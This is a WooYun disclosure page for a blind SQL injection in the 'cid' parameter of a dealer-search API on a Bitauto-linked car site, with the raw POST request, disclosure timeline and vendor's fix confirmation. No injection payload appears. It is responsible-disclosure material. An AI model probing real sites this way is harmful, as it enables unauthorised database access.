当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0131490

漏洞标题:易车某系统sql注射漏洞

相关厂商:易车

漏洞作者: BeenQuiver

提交时间:2015-08-04 11:47

修复时间:2015-09-18 12:20

公开时间:2015-09-18 12:20

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-04: 细节已通知厂商并且等待厂商处理中
2015-08-04: 厂商已经确认,细节仅向厂商公开
2015-08-14: 细节向核心白帽子及相关领域专家公开
2015-08-24: 细节向普通白帽子公开
2015-09-03: 细节向实习白帽子公开
2015-09-18: 细节向公众公开

简要描述:

某系统sql注射

详细说明:

http://www.dfyl-luxgen.com/index.php/lifehouse
该页面存在post型注入,boolean bases blind,参数为cid
POST /index.php/api/searchgetdelaers?time=0.40741090243682265 HTTP/1.1
Host: www.dfyl-luxgen.com
Proxy-Connection: keep-alive
Content-Length: 7
Accept: */*
Origin: http://www.dfyl-luxgen.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://www.dfyl-luxgen.com/index.php/lifehouse
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: _gat=1; CIGDCSCD=1438657931; CIGDCJZMP=1438657931; _ga=GA1.2.1750492344.1438657927; Hm_lvt_7a357b718ec26e4b61ecd930ef7cf199=1438657970; Hm_lpvt_7a357b718ec26e4b61ecd930ef7cf199=1438657988; pt_s_2e2ebe5f=vt=1438657987948&cad=; dmt43=6%7C0%7C0%7Cwww.dfyl-luxgen.com%2Findex.php%2Flifehouse%7Cwww.dfyl-luxgen.com%2Findex.php%2Ftestdrive; dmts43=1; dm43=1%7C1438657988%7C0%7C%7C%7C%7C%7C1438657931%7C1438657931%7C0%7C1438657931%7C923042015080410550655c0298aaea25%7C0%7C%7C; dm_rff43=%5B%5Dwww.dfyl-luxgen.com%252F%5B%5D0%5B%5D; dcad43=; dc_search43=; CIGDCID=923042015080410550655c0298aaea25; CIGDCTP=0; CIGDCTS=0; CIGDCAD=; CIGDCSE=; pt_t_2e2ebe5f=; pt_2e2ebe5f=uid=Lr1vl0CLEBpUrCrGC86WzQ&nid=0&vid=-JQ4k28PQm2CAeQ5V8UkBA&vn=1&pvn=5&sact=1438658043603&to_flag=0&pl=eyp6e51xzM0Z9s-N8FvVJQ*pt*1438657987948
cid=201

漏洞证明:

2015-08-04_113206.png


2015-08-04_113241.png

修复方案:

过滤

版权声明:转载请注明来源 BeenQuiver@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2015-08-04 12:19

厂商回复:

非常感谢对易车的帮助,我们尽快修复

最新状态:

2015-08-05:已经修复,非常感谢对易车的支持